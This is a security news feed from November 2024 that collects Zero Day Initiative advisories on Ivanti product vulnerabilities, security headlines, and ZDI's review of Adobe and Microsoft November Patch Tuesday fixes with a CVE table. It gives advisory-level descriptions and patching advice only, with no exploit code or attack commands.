ZDI-24-1508: Ivanti Endpoint Manager GetDetectedVulnerabilitiesDataTable SQL Injection Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-50328.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
ZDI-24-1507: Ivanti Endpoint Manager ROI SQL Injection Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-50327.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
ZDI-24-1506: Ivanti Endpoint Manager serverStorage SQL Injection Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-50326.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
ZDI-24-1505: Ivanti Endpoint Manager GetFilePath Directory Traversal Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-50324.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
ZDI-24-1504: Ivanti Endpoint Manager TestAllowedSQL SQL Injection Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. Alternatively, no user interaction is required if the attacker has administrative credentials to the application. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-50323.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
ZDI-24-1503: Ivanti Endpoint Manager OnSaveToDB Directory Traversal Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. Alternatively, no user interaction is required if the attacker has administrative credentials to the application. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-50322.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
ZDI-24-1502: Ivanti Endpoint Manager Report_RunPatch SQL Injection Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-37376.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
ZDI-24-1501: Ivanti Endpoint Manager EFile Directory Traversal Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. Alternatively, no user interaction is required if the attacker has administrative credentials to the application. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-34787.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
ZDI-24-1500: Ivanti Endpoint Manager DBDR SQL Injection Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-34784.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
ZDI-24-1499: Ivanti Endpoint Manager PatchHistory SQL Injection Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-34782.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
ZDI-24-1498: Ivanti Endpoint Manager Report_Run SQL Injection Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-34781.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
ZDI-24-1497: Ivanti Endpoint Manager MP_QueryDetail SQL Injection Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-34781.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
ZDI-24-1496: Ivanti Endpoint Manager Report_Run2 SQL Injection Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-32847.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
ZDI-24-1495: Ivanti Endpoint Manager MP_QueryDetail2 SQL Injection Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-32844.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
ZDI-24-1494: Ivanti Endpoint Manager GetCountForQuery SQL Injection Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-32841.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
ZDI-24-1493: Ivanti Endpoint Manager MP_VistaReport SQL Injection Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-32839.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
ZDI-24-1492: Ivanti Avalanche WLAvalancheService TV_FP Infinite Loop Denial-of-Service Vulnerability
This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-50321.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
ZDI-24-1491: Ivanti Avalanche WLAvalancheService TV_FC Infinite Loop Denial-of-Service Vulnerability
This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-50320.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
ZDI-24-1490: Ivanti Avalanche WLAvalancheService TV_FN Infinite Loop Denial-of-Service Vulnerability
This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-50319.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
ZDI-24-1489: Ivanti Avalanche WLAvalancheService TV_FP Null Pointer Dereference Denial-of-Service Vulnerability
This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-50318.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
ZDI-24-1488: Ivanti Avalanche WLAvalancheService TV_FN Null Pointer Dereference Denial-of-Service Vulnerability
This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-50317.
by Zero Day Initiative Advisories
2024-11-13 00:00:00
ZDI-24-1487: Ivanti Secure Access Client Pulse Secure Service Link Following Local Privilege Escalation Vulnerability
This vulnerability allows local attackers to escalate privileges on affected installations of Ivanti Secure Access Client. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-7571.
by Zero Day Initiative Advisories
2024-11-12 23:59:00
Last Week in Security (LWiS) - 2024-11-12
🕵️📱 Mysterious iPhone reboots, Tor under attack, Citrix Unauth RCE (@SinSinology), GitHub Actions attack (@adnanthekhan), and more!
by Bad Sector Labs
2024-11-12 23:11:47
November Patch Tuesday release contains three critical remote code execution vulnerabilities
The Patch Tuesday for November of 2024 includes 91 vulnerabilities, including two that Microsoft marked as “critical.” The remaining 89 vulnerabilities listed are classified as “important.”
by Cisco Talos Blog
2024-11-12 22:41:11
2 Zero-Day Bugs in Microsoft's Nov. Update Under Active Exploit
The November 2024 Patch Tuesday update contains a substantially high percentage of remote code execution (RCE) vulnerabilities (including a critical issue in Windows Kerberos), and two other zero-day bugs that have been previously disclosed and could soon come under attack.
by Dark Reading
2024-11-12 22:18:29
Amazon Employee Data Compromised in MOVEit Breach
The data leak was not actually due to a breach in Amazon's systems but rather that of a third-party vendor; the supply chain incident affected several other clients as well.
by Dark Reading
2024-11-12 22:04:09
Volunteers needed to help secure AI models
OWASP is looking for cybersecurity professionals to volunteer on AI security projects.
by Barracuda
2024-11-12 21:59:46
Microsoft Patch Tuesday, November 2024 Edition
Microsoft today released updates to plug at least 89 security holes in its Windows operating systems and other software. November's patch batch includes fixes for two zero-day vulnerabilities that are already being exploited by attackers, as well as two other flaws that were publicly disclosed prior to today.
by Krebs on Security
2024-11-12 20:48:52
New Essay Competition Explores AI's Role in Cybersecurity
The essays are to focus on the impact that artificial intelligence will have on European policy.
by Dark Reading
2024-11-12 20:38:33
Nation-State Threat Actors Rely on Social Engineering First
A new report from ESET has found that most nation-state threat actors rely on spear phishing as a primary initial access technique.
by KnowBe4
2024-11-12 20:38:29
Step-by-Step To Creating Your First Realistic Deepfake Video in a Few Minutes
Learn how to step-by-step create your first realistic deepfake video in a few minutes.
by KnowBe4
2024-11-12 19:50:49
🐝 Hive Five 197 - Winning doesn’t always feel like winning
Life-changing purchases under $100, Common Detection & Evasion Techniques for WAFs, Aaron Swartz Day 2024, From failing 22 times to building a $2.5B Company, and more...
by Hive Five
2024-11-12 19:46:24
CrowdStrike Spends to Boost Identity Threat Detection
Adaptive Shield is the third security posture management provider the company has acquired in the past 14 months as identity-based attacks continue to rise.
by Dark Reading
2024-11-12 19:31:00
New Flaws in Citrix Virtual Apps Enable RCE Attacks via MSMQ Misconfiguration
Cybersecurity researchers have disclosed new security flaws impacting Citrix Virtual Apps and Desktop that could be exploited to achieve unauthenticated remote code execution (RCE). The issue, per findings from watchTowr, is rooted in the Session Recording component that allows system administrators to capture user activity, and record keyboard and mouse input, along with a video stream of the
by The Hacker News
2024-11-12 19:30:00
New Phishing Tool GoIssue Targets GitHub Developers in Bulk Email Campaigns
Cybersecurity researchers are calling attention to a new sophisticated tool called GoIssue that can be used to send phishing messages at scale targeting GitHub users. The program, first marketed by a threat actor named cyberdluffy (aka Cyber D' Luffy) on the Runion forum earlier this August, is advertised as a tool that allows criminal actors to extract email addresses from public GitHub
by The Hacker News
2024-11-12 19:12:34
Singapore wants police to stop stubborn victims from sending money to scammers
With scam cases still climbing despite multiple safeguards, the proposed bill aims to restrict certain victims from making online banking transactions.
by ZDNET Security
2024-11-12 18:46:08
Get NordVPN free for three months with this early Black Friday deal
As Black Friday approaches, you can take advantage of NordVPN's latest promotion: a discounted plan with free months of service thrown in to sweeten the deal.
by ZDNET Security
2024-11-12 18:30:00
North Korean Hackers Target macOS Using Flutter-Embedded Malware
Threat actors with ties to the Democratic People's Republic of Korea (DPRK aka North Korea) have been found embedding malware within Flutter applications, marking the first time this tactic has been adopted by the adversary to infect Apple macOS devices. Jamf Threat Labs, which made the discovery based on artifacts uploaded to the VirusTotal platform earlier this month, said the Flutter-built
by The Hacker News
2024-11-12 18:26:35
The November 2024 Security Update Review
It’s not quite the holiday season, despite what some early decorators will have you believe. It is the second Tuesday of the month, and that means Adobe and Microsoft have released their regularly scheduled updates. Take a break from your regular activities and join us as we review the details of their latest security alerts. If you’d rather watch the full video recap covering the entire release, you can check it out here:
Adobe Patches for November 2024
For November, Adobe released eight patches addressing 48 CVEs in Adobe Bridge, Audition, After Effects, Substance 3D Painter, Illustrator, InDesign, Photoshop, and Commerce. The largest of these fixes is for Substance 3D Painter with 22 Critical and Important CVEs. The next largest is the patch for Illustrator, with nine CVEs addressed. The fix for After Effects addresses six bugs – three Critical and three Important. The worst of these could allow arbitrary code execution. That’s the same story for the InDesign patch. There’s a single server-side request forgery (SSRF) in Commerce, but it requires authentication. There’s also a single, Critical-rated CVE in Photoshop, which requires user interaction in the form of opening a file. The remaining fixes from Adobe are only Important rated, with two bugs in Adobe Bridge and a single bug in Adobe Audition. None of the bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release. Adobe categorizes these updates as a deployment priority rating of 3.
Microsoft Patches for November 2024
This month, Microsoft released 89 new CVEs in Windows and Windows Components; Office and Office Components; Azure; .NET and Visual Studio; LightGBM; Exchange Server; SQL Server; TorchGeo; Hyper-V; and Windows VMSwitch. One of these vulnerabilities was reported through the ZDI program. With the addition of the third-party CVEs, the entire release tops out at 92 CVEs. Of the patches released today, four are rated Critical, 84 are rated Important, and one is rated Moderate in severity. This represents another large month of fixes from the Redmond giant and puts them at 949 CVEs addressed so far this year. Even before counting the fixes in December, 2024 is Microsoft's second-largest year for fixes. Microsoft lists three of these CVEs as publicly known, but I disagree and put the count at five (more on that later). They also list two as being exploited in the wild at the time of release. Let’s take a closer look at some of the more interesting updates for this month, starting with the vulnerabilities currently under active attack:
CVE-2024-43451 - NTLM Hash Disclosure Spoofing Vulnerability
It seems we can never fully escape Internet Explorer. Despite it being retired by Microsoft, it still remains in the form of MSHTML and is accessible through the WebBrowser control and other means. That is what is being abused by attackers here to disclose the victim’s NTLMv2 hash, which could then be used by the attacker to authenticate as the user. User interaction is required, but that doesn’t seem to stop these attacks from being effective. As always, Microsoft does not give any indication of how widespread these attacks are, but I would not wait to test and deploy this update.
CVE-2024-49039 - Windows Task Scheduler Elevation of Privilege Vulnerability
Here’s another local privilege escalation bug being used in the wild. However, this isn’t the straightforward EoP we typically see. In this case, the bug allows an AppContainer escape – allowing a low-privileged user to execute code at Medium integrity. You still need to be able to execute code on the system for this to occur, but container escapes are still quite interesting as they are rarely seen in the wild. This was reported by multiple researchers, which indicates the bug is being exploited in multiple regions. Hopefully one of the researchers will provide additional details about the vulnerability now that a fix is available.
CVE-2024-43639 - Windows Kerberos Remote Code Execution Vulnerability
I don’t often get excited about bugs (ok – that’s a lie – I totally do), but this CVSS 9.8 bug excites me. The vulnerability allows a remote, unauthenticated attacker to run code on an affected system by leveraging a bug in the cryptographic protocol. No user interaction is required. Since Kerberos runs with elevated privileges, that makes this a wormable bug between affected systems. What systems are impacted? Every supported version of Windows Server. I somehow doubt this will actually be seen in the wild, but I wouldn’t take that chance. Test and deploy this fix quickly.
CVE-2024-43498 - .NET and Visual Studio Remote Code Execution Vulnerability
This is one of the bugs I say is public even though Microsoft doesn’t, as it sure looks like this issue. This is another CVSS 9.8 and would allow attackers to execute code by sending a specially crafted request to an affected .NET webapp. The attacker could also convince a target to load a specially crafted file from an affected desktop app. Either way, the resulting code execution would occur at the level of the application, so it may be paired with an EoP if it were to be seen in the wild. Definitely check your .NET and Visual Studio apps and patch them as needed.
Here’s the full list of CVEs released by Microsoft for November 2024:
| CVE | Title | Severity | CVSS | Public | Exploited | Type |
| --- | --- | --- | --- | --- | --- | --- |
| CVE-2024-43451 | NTLM Hash Disclosure Spoofing Vulnerability | Important | 6.5 | Yes | Yes | Spoofing |
| CVE-2024-49039 | Windows Task Scheduler Elevation of Privilege Vulnerability | Important | 8.8 | No | Yes | EoP |
| CVE-2024-43498 | .NET and Visual Studio Remote Code Execution Vulnerability | Critical | 9.8 | Yes ** | No | RCE |
| CVE-2024-5535 * | OpenSSL: CVE-2024-5535 SSL_select_next_proto buffer overread | Important | 9.1 | Yes ** | No | RCE |
| CVE-2024-49019 | Active Directory Certificate Services Elevation of Privilege Vulnerability | Important | 7.8 | Yes | No | EoP |
| CVE-2024-49040 † | Microsoft Exchange Server Spoofing Vulnerability | Important | 7.5 | Yes | No | Spoofing |
| CVE-2024-49056 | Airlift.microsoft.com Elevation of Privilege Vulnerability | Critical | 7.3 | No | No | EoP |
| CVE-2024-43625 | Microsoft Windows VMSwitch Elevation of Privilege Vulnerability | Critical | 8.1 | No | No | EoP |
| CVE-2024-43639 | Windows Kerberos Remote Code Execution Vulnerability | Critical | 9.8 | No | No | RCE |
| CVE-2024-43499 | .NET and Visual Studio Denial of Service Vulnerability | Important | 7.5 | No | No | DoS |
| CVE-2024-43602 | Azure CycleCloud Remote Code Execution Vulnerability | Important | 9.9 | No | No | RCE |
| CVE-2024-43613 | Azure Database for PostgreSQL Flexible Server Extension Elevation of Privilege Vulnerability | Important | 7.2 | No | No | EoP |
| CVE-2024-49042 | Azure Database for PostgreSQL Flexible Server Extension Elevation of Privilege Vulnerability | Important | 7.2 | No | No | EoP |
| CVE-2024-43598 | LightGBM Remote Code Execution Vulnerability | Important | 7.5 | No | No | RCE |
| CVE-2024-49026 | Microsoft Excel Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2024-49027 | Microsoft Excel Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2024-49028 | Microsoft Excel Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2024-49029 | Microsoft Excel Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2024-49030 | Microsoft Excel Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2024-49031 | Microsoft Office Graphics Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2024-49032 | Microsoft Office Graphics Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2024-49051 | Microsoft PC Manager Elevation of Privilege Vulnerability | Important | 8.4 | No | No | EoP |
| CVE-2024-49021 | Microsoft SQL Server Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2024-38264 | Microsoft Virtual Hard Disk (VHDX) Denial of Service Vulnerability | Important | 5.9 | No | No | DoS |
| CVE-2024-49033 | Microsoft Word Security Feature Bypass Vulnerability | Important | 7.5 | No | No | SFB |
| CVE-2024-49043 † | Microsoft.SqlServer.XEvent.Configuration.dll Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2024-38255 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-43459 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-43462 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-48993 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-48994 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-48995 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-48996 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-48997 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-48998 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-48999 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-49000 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-49001 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-49002 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-49003 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-49004 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-49005 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-49006 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-49007 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-49008 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-49009 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-49010 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-49011 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-49012 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-49013 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-49014 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-49015 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-49016 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-49017 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-49018 | SQL Server Native Client Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-49048 | TorchGeo Remote Code Execution Vulnerability | Important | 8.1 | No | No | RCE |
| CVE-2024-49050 | Visual Studio Code Python Extension Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-49044 | Visual Studio Elevation of Privilege Vulnerability | Important | 6.7 | No | No | EoP |
| CVE-2024-43636 | | | | | | |
Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-43644 Windows Client-Side Caching Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-43645 Windows Defender Application Control (WDAC) Security Feature Bypass Vulnerability Important 6.7 No No SFB CVE-2024-43450 Windows DNS Spoofing Vulnerability Important 7.5 No No Spoofing CVE-2024-43629 Windows DWM Core Library Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-43633 Windows Hyper-V Denial of Service Vulnerability Important 6.5 No No DoS CVE-2024-43624 Windows Hyper-V Shared Virtual Disk Elevation of Privilege Vulnerability Important 8.8 No No EoP CVE-2024-43630 Windows Kernel Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-43640 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-43623 Windows NT OS Kernel Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-38203 Windows Package Library Manager Information Disclosure Vulnerability Important 6.2 No No Info CVE-2024-43641 Windows Registry Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-43452 Windows Registry Elevation of Privilege Vulnerability Important 7.5 No No EoP CVE-2024-43631 Windows Secure Kernel Mode Elevation of Privilege Vulnerability Important 6.7 No No EoP CVE-2024-43646 Windows Secure Kernel Mode Elevation of Privilege Vulnerability Important 6.7 No No EoP CVE-2024-43642 Windows SMB Denial of Service Vulnerability Important 7.5 No No DoS CVE-2024-43447 Windows SMBv3 Server Remote Code Execution Vulnerability Important 8.1 No No RCE CVE-2024-43626 Windows Telephony Service Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-43620 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-43621 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-43622 Windows Telephony Service Remote Code 
Execution Vulnerability Important 8.8 No No RCE CVE-2024-43627 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-43628 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-43635 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-43530 Windows Update Stack Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-43449 Windows USB Video Class System Driver Elevation of Privilege Vulnerability Important 6.8 No No EoP CVE-2024-43634 Windows USB Video Class System Driver Elevation of Privilege Vulnerability Important 6.8 No No EoP CVE-2024-43637 Windows USB Video Class System Driver Elevation of Privilege Vulnerability Important 6.8 No No EoP CVE-2024-43638 Windows USB Video Class System Driver Elevation of Privilege Vulnerability Important 6.8 No No EoP CVE-2024-43643 Windows USB Video Class System Driver Elevation of Privilege Vulnerability Important 6.8 No No EoP CVE-2024-49046 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-49049 Visual Studio Code Remote Extension Elevation of Privilege Vulnerability Moderate 7.1 No No EoP CVE-2024-10826 * Chromium: CVE-2024-10826 Use after free in Family Experiences High N/A No No RCE CVE-2024-10827 * Chromium: CVE-2024-10827 Use after free in Serial High N/A No No RCE * Indicates this CVE had been released by a third party and is now being included in Microsoft releases.** Indicates this bug is not listed as public by Microsoft but considered to be public for the purposes of this blog.† Indicates further administrative actions are required to fully address the vulnerability.There are only two other Critical-rated bugs receiving fixes this month, and both involve privilege escalations. The bug in VMSwitch could allow a low-privileged user on a guest OS to execute their code at SYSTEM on the underlying host OS. 
That’s officially a Bad Thing™. The other Critical-rated bug resides in a cloud service, so the vulnerability has already been mitigated and is now being documented.

There are more than 50 other code execution bugs this month, but most of these impact SQL Server. These require an affected system to connect to a malicious SQL database, so the likelihood of exploitation is pretty low. There is one SQL bug that requires additional attention. CVE-2024-49043 requires an update to OLE DB Driver 18 or 19, but may also require third-party fixes. Ensure you read that one carefully and apply all the needed fixes. There are also quite a few open-and-own bugs in Office components, but none involve the Preview Pane. There are a half-dozen RCE bugs in the Telephony service. These all require the target to connect to a malicious server, but this could be done by tricking the user into sending a request to the attacker-controlled server.

Of the more interesting RCE bugs, the SMBv3 bug stands out. An attacker could exploit this by using a malicious SMB client to mount an attack against an affected SMB server. Interestingly, this is only applicable to SMB over QUIC, which might not be a common setup. Another interesting bug is a CVSS 9.9 vulnerability in Azure CycleCloud. This does require basic permissions but could be used to gain root-level permissions and execute commands on any Azure CycleCloud cluster in the current instance. Neat. There’s an RCE in TorchGeo, a PyTorch domain library for use with machine learning. There’s no real information about the vulnerability, but it can be hit remotely and doesn’t require user interaction. Finally, there’s the Microsoft update for OpenSSL. They do not list this as public, but this bug was documented back in June. Even though this is a third-party update, I find not listing this as public is disingenuous.

There are more than two dozen fixes for privilege escalation bugs in this release. Most of these lead either to SYSTEM-level code execution or to administrative privileges if an authenticated user runs specially crafted code, but a few stand out. The bugs in the USB Video Class System require physical access, as the attacker needs to plug in a USB device. This would also lead to SYSTEM-level code execution. The escalation in Active Directory Certificate Services would allow an attacker to gain administrative privileges, but only if your PKI environment is set to specific parameters, so read the bulletin for details. The bugs in Azure Database for PostgreSQL could lead to the same privileges as the SuperUser role. The bug in PC Manager allows attackers to delete files, which can be used to elevate privileges. The Visual Studio bug just gets to the privileges of the current user. Finally, the bug in Hyper-V could allow guest-to-host code execution at SYSTEM on the host OS. Microsoft lists this as a CVSS 8.8, but considering this could be viewed as a scope change (going from guest OS to SYSTEM), I would rate it at a 9.9.

There are only two Security Feature Bypass (SFB) bugs in the November release. The bug in Word could allow attackers to bypass Office Protected View. Not surprisingly, the bypass in Windows Defender Application Control (WDAC) allows attackers to bypass WDAC enforcement and run unauthorized apps.

There’s only a single information disclosure bug getting fixed this month, and it resides in the Windows Package Library Manager. It allows attackers to expose privileged information belonging to the user of the affected application.

There are a couple of spoofing bugs being addressed, and the first is in Exchange Server. Microsoft doesn’t list what is being spoofed, but with Exchange Server, this often leads to NTLM relays. And you’ll need to do more than patch this bug. You need to take the additional actions listed here to be fully protected, which is just what every Exchange admin wants to hear. The other spoofing bug is in DNS. Again, no real information is given by Microsoft, but DNS spoofing bugs typically lead to altered DNS responses.

The November release is rounded out by four denial-of-service (DoS) bugs. As usual, Microsoft provides next to no information about these bugs or their impact. The only exception to this is the DoS bug in Hyper-V, which could be used to execute a cross-VM attack – allowing one guest VM to impact other guest VMs on the same hypervisor.

There are no new advisories in this month’s release.

Looking Ahead

The final Patch Tuesday of 2024 will be on December 10, and I’ll return with details and patch analysis at that time. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!
by Zero Day Initiative Blog
2024-11-12 17:44:24
'GoIssue' Cybercrime Tool Targets GitHub Developers En Masse
Marketed on a cybercriminal forum, the $700 tool harvests email addresses from public GitHub profiles, priming cyberattackers for further credential theft, malware delivery, OAuth subversion, supply chain attacks, and other corporate breaches.
by Dark Reading
2024-11-12 17:30:46
Hamas-affiliated Threat Actor WIRTE Continues its Middle East Operations and Moves to Disruptive Activity
WIRTE is a Middle Eastern Advanced Persistent Threat (APT) group active since at least 2018. The group is primarily known for engaging in politically motivated cyber-espionage, focusing on intelligence gathering likely linked to regional geopolitical conflicts. WIRTE is believed to be a subgroup connected to Gaza Cybergang, a cluster affiliated with Hamas. Since late 2023, Check […]
by Check Point Research
2024-11-12 17:17:17
Snowflake hackers identified and charged with stealing 50 billion AT&T records
The U.S. Department of Justice indicted two hackers for breaking into the systems of AT&T and several other companies.
by TechCrunch
2024-11-12 16:31:25
Citrix Patches Zero-Day Recording Manager Bugs
